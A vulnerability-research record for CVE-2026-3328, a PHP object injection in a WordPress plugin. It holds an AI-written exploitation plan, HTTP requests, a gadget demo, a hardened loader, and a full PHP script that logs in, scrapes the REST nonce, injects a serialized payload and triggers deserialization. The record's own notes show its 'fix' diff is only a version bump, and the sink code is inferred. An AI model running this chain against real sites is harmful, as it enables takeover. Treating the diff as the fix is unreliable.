[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ3_fWdlEtOkh5NKj3gr4pn0mUe6fvu9XGayvlDdFF14":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-3328","frontend-admin-by-dynamiapps-authenticated-editor-php-object-injection-via-postcontent-of-admin-form-posts","Frontend Admin by DynamiApps \u003C= 3.28.31 - Authenticated (Editor+) PHP Object Injection via 'post_content' of Admin Form Posts","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to PHP Object Injection via deserialization of the 'post_content' of admin_form posts in all versions up to, and including, 3.28.31. This is due to the use of WordPress's `maybe_unserialize()` function without class restrictions on user-controllable content stored in admin_form post content. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. 
The additional presence of a POP chain allows attackers to achieve remote code execution.","acf-frontend-form-element",null,"\u003C=3.28.31","3.28.32","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2026-03-25 14:11:27","2026-03-26 02:25:19",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0faa8f07-88c1-4638-9de5-e202807866e1?source=api-prod",1,[22,23,24,25,26],"acf-frontend.php","assets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php","assets\u002Fbuild\u002Fadmin-form\u002Findex.js","assets\u002Fbuild\u002Fblocks\u002Fadmin-form\u002Fblock.json","assets\u002Fbuild\u002Fblocks\u002Fpayment-form\u002Fblock.json","researched",false,3,"This research plan targets a PHP Object Injection vulnerability in the **Frontend Admin by DynamiApps** plugin (\u003C= 3.28.31), where the plugin improperly uses `maybe_unserialize()` on the `post_content` of `admin_form` posts.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** PHP Object Injection (Deserialization)\n*   **CPT Involved:** `admin_form` (Custom Post Type used by the plugin to store form configurations).\n*   **Vulnerable Sink:** `maybe_unserialize()` applied to the `post_content` of an `admin_form` post during form processing or rendering.\n*   **Root Cause:** The plugin stores form settings in the `post_content` field. When loading these settings, it retrieves the content and passes it to `maybe_unserialize()`. Since Editors (and above) can modify `admin_form` posts, they can inject a serialized PHP string that, when unserialized, instantiates arbitrary objects.\n*   **Severity:** High (7.2). Requires Editor+ level permissions.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** The standard WordPress REST API for posts (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form\u002F\u003Cid>`) or the Block Renderer API.\n*   **Vulnerable Parameter:** `post_content` (or `content` in REST API terms).\n*   **Authentication:** Authenticated (Editor or higher).\n*   **Preconditions:** The plugin must be active, and at least one `admin_form` post must exist (or the Editor must be able to create one).\n\n### 3. Code Flow\n1.  **Storage:** An Editor saves or updates an `admin_form` post. This can be done via the Gutenberg editor or a REST API request. The payload is stored in the `wp_posts` table under `post_content`.\n2.  **Retrieval:** When a page containing the `acf-frontend\u002Fform` block (defined in `assets\u002Fbuild\u002Fblocks\u002Fadmin-form\u002Fblock.json`) is loaded, the server-side rendering logic is triggered.\n3.  **Sink Path (Inferred):**\n    *   The `acf-frontend\u002Fform` block uses `ServerSideRender` (seen in `assets\u002Fbuild\u002Fadmin-form\u002Findex.js`).\n    *   The backend handler for this block likely calls `get_post($formID)`.\n    *   The code then performs `maybe_unserialize( $post->post_content )` to parse the form configuration.\n    *   If the `post_content` starts with `O:`, `a:`, etc., `maybe_unserialize` will execute PHP's `unserialize()`, triggering any `__wakeup` or `__destruct` methods in the injected object's class (or other magic methods if a POP chain is constructed).\n\n### 4. Nonce Acquisition Strategy\nSince the attack requires Editor privileges, we use the standard WordPress REST API nonce.\n1.  **Login:** Authenticate as an Editor.\n2.  **Navigation:** Navigate to the WordPress dashboard (`\u002Fwp-admin\u002F`).\n3.  **Extraction:** The REST API nonce is typically localized in the `wpApiSettings` JavaScript object.\n4.  
**Action:** Use the `browser_eval` tool to extract the nonce:\n    ```javascript\n    browser_eval(\"window.wpApiSettings?.nonce\")\n    ```\n\n### 5. Exploitation Strategy\nThe goal is to update an `admin_form` post with a serialized payload and then trigger its deserialization.\n\n**Step 1: Identify or Create an `admin_form` post**\n*   Use the REST API to list existing forms:\n    `GET \u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form` (Headers: `X-WP-Nonce: \u003CNONCE>`)\n*   If none exist, create one:\n    `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form`\n    Body: `{\"title\": \"Exploit Form\", \"status\": \"publish\"}`\n\n**Step 2: Inject the Serialized Payload**\n*   Update the `post_content` of the `admin_form` (assume ID is `123`).\n*   **Payload Example:** `O:8:\"WP_Query\":1:{s:5:\"query\";s:12:\"test_payload\";}` (This is a benign example; a real POP chain would target available classes like those in ACF or Freemius).\n*   **Request:**\n    ```http\n    POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form\u002F123\n    Content-Type: application\u002Fjson\n    X-WP-Nonce: \u003CNONCE>\n\n    {\n      \"content\": \"O:8:\\\"WP_Query\\\":1:{s:5:\\\"query\\\";s:12:\\\"test_payload\\\";}\"\n    }\n    ```\n\n**Step 3: Trigger Deserialization**\n*   Trigger the Block Renderer for the `acf-frontend\u002Fform` block. This forces the server to process the form settings for the specified `formID`.\n*   **Request:**\n    ```http\n    GET \u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Facf-frontend\u002Fform?attributes[formID]=123&attributes[editMode]=true\n    X-WP-Nonce: \u003CNONCE>\n    ```\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `editor` role.\n2.  **Plugin:** Ensure \"Frontend Admin\" (acf-frontend-form-element) is installed and active.\n3.  **Form:** Use WP-CLI to quickly create an `admin_form` if needed:\n    ```bash\n    wp post create --post_type=admin_form --post_title=\"Vuln Post\" --post_status=publish\n    ```\n\n### 7. 
Expected Results\n*   **Success Criteria:** The server should attempt to unserialize the payload. If a valid POP chain is used, its side effects (e.g., file creation, an outbound request, or log entries) will be visible.\n*   **Response:** The `block-renderer` request will typically return 200 OK; a 500 Internal Server Error indicates that the chain, or the unexpected object type handed back to the plugin, caused a fatal error after the deserialization had already run.\n\n### 8. Verification Steps\n1.  **Verify Storage:** Check the database to confirm the serialized string is in `post_content`:\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_type='admin_form' AND ID=123\"\n    ```\n2.  **Monitor Logs:** Check `wp-content\u002Fdebug.log` for output or side effects from the POP chain. Note that `unserialize()` does not log a \"Class not found\" error when the payload names a class that is not loaded; it silently returns a `__PHP_Incomplete_Class` object, so the more likely log signal is a later warning or TypeError when the plugin treats that object as an array.\n3.  **Confirm Execution:** If the POP chain is designed to create a file (e.g., `poc.php`), verify its existence:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Fpoc.php\n    ```\n\n### 9. Alternative Approaches\n*   **Shortcode Trigger:** If the REST Block Renderer is restricted, create a page with the shortcode: `[acf_frontend_form id=\"123\"]` and navigate to that page using the browser.\n*   **AJAX Save:** If the REST API for `admin_form` is disabled, the plugin likely has a custom AJAX handler for saving form settings. Check for `wp_ajax_save_form` or similar in the plugin's `main\u002F` directory.\n*   **Gutenberg Context:** Use `browser_navigate` to the `admin_form` edit page and use `browser_eval` to programmatically update the block content and click \"Update\".","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to PHP Object Injection via the 'post_content' field of 'admin_form' posts. 
Authenticated attackers with Editor-level access or higher can inject serialized PHP objects into a form's configuration, which are then processed by WordPress's `maybe_unserialize()` function without restrictions when the form is rendered, potentially leading to remote code execution through a POP chain.","\u002F\u002F The exact PHP logic for the ServerSideRender handler was not provided in the source files,\n\u002F\u002F but the vulnerability resides in the retrieval and parsing of 'admin_form' post content.\n\u002F\u002F Inferred logic based on the research plan and vulnerability description:\n\n\u002F* \n * Path: [Inferred: main\u002Fplugin.php or block rendering logic]\n * Sink: maybe_unserialize() applied to user-controllable post_content\n *\u002F\n\n\u002F\u002F 1. Retrieve the form post\n$post = get_post($formID);\n\n\u002F\u002F 2. Vulnerable sink: Deserializing the post content which an Editor can modify\n$form_settings = maybe_unserialize( $post->post_content );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Facf-frontend.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Facf-frontend.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Facf-frontend.php\t2026-03-01 15:32:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Facf-frontend.php\t2026-03-22 07:43:14.000000000 +0000\n@@ -3,7 +3,7 @@\n  * Plugin Name: Frontend Admin\n  * Plugin URI:  https:\u002F\u002Fwww.dynamiapps.com\u002Ffrontend-admin\u002F\n  * Description: This awesome plugin allows you to easily display admin forms to the frontend of your site so your clients can easily edit content on their own from the frontend.\n- * Version:     3.28.30\n+ * Version:     
3.28.32\n  * Author:      Shabti Kaplan\n  * Author URI:  https:\u002F\u002Fwww.dynamiapps.com\u002F\n  * Text Domain: frontend-admin\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php\t2025-12-24 11:42:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php\t2026-03-19 19:18:36.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-editor', 'wp-i18n'), 'version' => '8b7ba72674c9013748dd');\n+\u003C?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-editor', 'wp-i18n'), 'version' => '6c99b59cbc083ea3dc47');","1. Authentication: Log in to the WordPress site as a user with Editor privileges or higher to obtain a valid REST API nonce.\n2. Payload Preparation: Create a serialized PHP object payload designed to trigger a POP chain (e.g., using classes available in the environment like Freemius or ACF).\n3. Injection: Update an existing `admin_form` post (or create a new one) by sending a REST API request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form\u002F\u003Cid>`. The payload should be placed in the `content` parameter.\n4. Execution: Trigger the deserialization of the injected object by invoking the block renderer for the specific form. 
This can be done via a request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Facf-frontend\u002Fform?attributes[formID]=\u003Cid>&attributes[editMode]=true` (the block-renderer endpoint only requires the `edit_posts` capability, which the Editor role has).","gemini-3-flash-preview","2026-04-17 22:50:46","2026-04-17 22:51:52",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","3.28.30","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags"]
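Review bot: the acf-frontend.php hunk in the research_fix_diff changes nothing but the plugin header, `- * Version:     3.28.30` to `+ * Version:     3.28.32`, so it is a release bump rather than the fix for the `maybe_unserialize()` sink the advisory describes. The comparison baseline is also off: the affected range is <= 3.28.31, but the diff is taken from 3.28.30, so any changes that landed in 3.28.31 are mixed in; re-diff 3.28.31 against 3.28.32 to isolate the security change.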
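Review bot: the index.asset.php hunk only rotates the generated build hash from '8b7ba72674c9013748dd' to '6c99b59cbc083ea3dc47' for the admin-form editor bundle, which is a build artifact, not a code change. Together with the first hunk this diff contains no server-side PHP change at all, even though patch_diff_files also lists assets/build/admin-form/index.js and the two block.json files; before treating this diff as the fix, locate the PHP change that replaces `maybe_unserialize( $post->post_content )` with `unserialize( ..., array( 'allowed_classes' => false ) )` (or a JSON-based config format) and include that hunk here.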
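The sink inferred in the research plan and research_vulnerable_code (`maybe_unserialize()` on Editor-controlled `post_content`) shown next to a hardened loader, as an added example that is not part of the advisory and not the plugin's own code. The `wp_like_*` helpers are assumed stand-ins that reproduce WordPress core's `is_serialized()` / `maybe_unserialize()` logic so the script runs without WordPress loaded, and `DemoGadget` is a constructed gadget class standing in for a real POP-chain class (the advisory names none); the marker file it writes is the demo's stand-in for a dropped webshell.

```php
<?php
declare(strict_types=1);
// Added example, not the plugin's code and not from the advisory. It shows the
// inferred sink (maybe_unserialize() on editor-controlled admin_form
// post_content) beside a hardened loader. Assumptions: the wp_like_* helpers
// reproduce WordPress core's is_serialized()/maybe_unserialize() logic because
// WP is not loaded here, and DemoGadget is a constructed stand-in gadget class.

/** Mirrors core is_serialized(): a cheap shape check, no class restriction. */
function wp_like_is_serialized(string $data): bool {
    $data = trim($data);
    if ($data === 'N;') {
        return true;
    }
    if (strlen($data) < 4 || $data[1] !== ':') {
        return false;
    }
    $last = substr($data, -1);
    switch ($data[0]) {
        case 's':
            return $last === ';' && substr($data, -2, 1) === '"';
        case 'a':
        case 'O':
            return $last === '}';
        case 'b':
        case 'i':
        case 'd':
            return $last === ';';
    }
    return false;
}

/** Mirrors core maybe_unserialize(): this is the vulnerable sink. */
function wp_like_maybe_unserialize(string $data) {
    return wp_like_is_serialized($data) ? @unserialize(trim($data)) : $data;
}

/** Constructed gadget: any loadable class with a magic method will do. */
class DemoGadget {
    public string $path = '';
    public string $body = '';
    public function __destruct() {
        // Runs when the object is freed, even if the plugin never "uses" it.
        // A real chain would drop a PHP file under the web root instead.
        file_put_contents($this->path, $this->body);
    }
}

/** Vulnerable loader: whatever the Editor stored comes back as live objects. */
function load_form_settings_vulnerable(string $post_content) {
    return wp_like_maybe_unserialize($post_content);
}

/** True if $value is or contains any object (incl. __PHP_Incomplete_Class). */
function contains_object($value): bool {
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

/** Hardened loader: no class instantiation, and only a plain array is accepted. */
function load_form_settings_hardened(string $post_content): array {
    $settings = wp_like_is_serialized($post_content)
        ? @unserialize(trim($post_content), ['allowed_classes' => false])
        : json_decode($post_content, true);
    if (!is_array($settings) || contains_object($settings)) {
        return [];   // a malformed or object-bearing config is treated as empty
    }
    return $settings;
}

// --- Demo -------------------------------------------------------------------
$marker = sys_get_temp_dir() . '/poi-demo-' . getmypid() . '.txt';
// The attacker builds the string by hand; the gadget class only has to exist
// on the target, which is why DemoGadget is never instantiated directly here.
$payload = sprintf('O:10:"DemoGadget":2:{s:4:"path";s:%d:"%s";s:4:"body";s:4:"pwnd";}',
    strlen($marker), $marker);

$settings = load_form_settings_vulnerable($payload);
printf("vulnerable: loaded %s\n", is_object($settings) ? get_class($settings) : gettype($settings));
unset($settings);   // refcount hits zero -> __destruct -> marker file written
printf("vulnerable: marker file exists: %s\n", file_exists($marker) ? 'yes' : 'no');
@unlink($marker);

$settings = load_form_settings_hardened($payload);
printf("hardened:   loaded %s with %d keys\n", gettype($settings), count($settings));
printf("hardened:   marker file exists: %s\n", file_exists($marker) ? 'yes' : 'no');

// A legitimate configuration still round-trips through the hardened loader.
$legit = serialize(['fields' => ['post_title', 'post_content'], 'submit_label' => 'Save']);
print_r(load_form_settings_hardened($legit));
```

Run it with `php poi-demo.php`: the vulnerable path reports `DemoGadget` and the marker file appears as soon as the object is released, while the hardened path returns an empty array and never instantiates the class because `allowed_classes => false` turns the `O:` record into an inert `__PHP_Incomplete_Class`. The `contains_object()` walk matters for nested payloads such as `a:1:{i:0;O:...}`, which would otherwise pass the `is_array()` check.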
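The REST sequence from sections 4 and 5 of the research plan and the exploit outline (login, nonce, write `post_content`, trigger the block renderer) scripted end to end, as an added example that is neither the advisory's nor the plugin's code. Everything below the comment header is an assumption for a lab install you own: the site URL, the Editor credentials, the form ID, the cookie-jar path, and that the `admin_form` post type is exposed through the core posts controller at `wp/v2/admin_form` (the advisory's plan assumes this too; the actual `rest_base` can be confirmed via `/wp-json/wp/v2/types`). The payload is the plan's benign `WP_Query` marker, not a POP chain.

```php
<?php
declare(strict_types=1);
// Added example, not part of the advisory, the research plan, or the plugin.
// Scripts the REST steps from the plan against a lab site. Assumptions: SITE,
// USER, PASS, FORM_ID, the cookie-jar path, and that the admin_form post type
// is served by the core posts controller at wp/v2/admin_form.

const SITE    = 'http://wordpress.test';   // assumption: local lab install
const USER    = 'editor';                  // assumption: Editor-role account
const PASS    = 'editor-password';         // assumption
const FORM_ID = 123;                       // assumption: an existing admin_form ID
define('JAR', sys_get_temp_dir() . '/wp-poc-cookies.txt');   // shared cookie jar

// Benign marker from the plan; a real POP-chain payload replaces this string.
const PAYLOAD = 'O:8:"WP_Query":1:{s:5:"query";s:12:"test_payload";}';

/** One HTTP request through the shared cookie jar; returns [status, body]. */
function request(string $method, string $url, array $headers = [], ?string $body = null): array {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIEJAR      => JAR,
        CURLOPT_COOKIEFILE     => JAR,
        CURLOPT_CUSTOMREQUEST  => $method,
        CURLOPT_HTTPHEADER     => $headers,
    ]);
    if ($body !== null) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    }
    $resp = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return [$code, is_string($resp) ? $resp : ''];
}

/** Pull the REST nonce that core localizes as wpApiSettings on admin pages. */
function extract_rest_nonce(string $html): ?string {
    return preg_match('/wpApiSettings\s*=\s*\{[^}]*"nonce":"([0-9a-f]+)"/', $html, $m) ? $m[1] : null;
}

// 1. Form login; the initial GET lets WordPress set its test cookie in the jar.
request('GET', SITE . '/wp-login.php');
request('POST', SITE . '/wp-login.php', [], http_build_query([
    'log' => USER, 'pwd' => PASS, 'wp-submit' => 'Log In',
    'redirect_to' => SITE . '/wp-admin/', 'testcookie' => '1',
]));

// 2. Cookie auth to the REST API is only honoured together with X-WP-Nonce.
[, $html] = request('GET', SITE . '/wp-admin/');
$nonce = extract_rest_nonce($html);
if ($nonce === null) {
    fwrite(STDERR, "no REST nonce in /wp-admin/ (login failed, or not an Editor?)\n");
    exit(1);
}

// 3. Store the serialized string as the form's post_content.
[$code, $body] = request('POST', SITE . '/wp-json/wp/v2/admin_form/' . FORM_ID,
    ['Content-Type: application/json', 'X-WP-Nonce: ' . $nonce],
    json_encode(['content' => PAYLOAD]));
printf("update post_content: HTTP %d\n", $code);
if ($code !== 200) {
    fwrite(STDERR, substr($body, 0, 300) . "\n");   // rest_no_route here means the rest_base differs
    exit(1);
}

// 4. Server-side rendering of the block loads the admin_form post and parses it.
$query = http_build_query(['attributes' => ['formID' => FORM_ID, 'editMode' => true]]);
[$code, $body] = request('GET', SITE . '/wp-json/wp/v2/block-renderer/acf-frontend/form?' . $query,
    ['X-WP-Nonce: ' . $nonce]);
printf("block-renderer: HTTP %d\n%s\n", $code, substr($body, 0, 300));
```

Step 4 works for an Editor because the block-renderer route only checks `edit_posts`. A 404 with `rest_no_route` at step 3 means the post type is not exposed under that base, in which case fall back to the plan's shortcode or Gutenberg alternatives; after testing, restore the form's original `post_content`, since the marker string stays in the database otherwise.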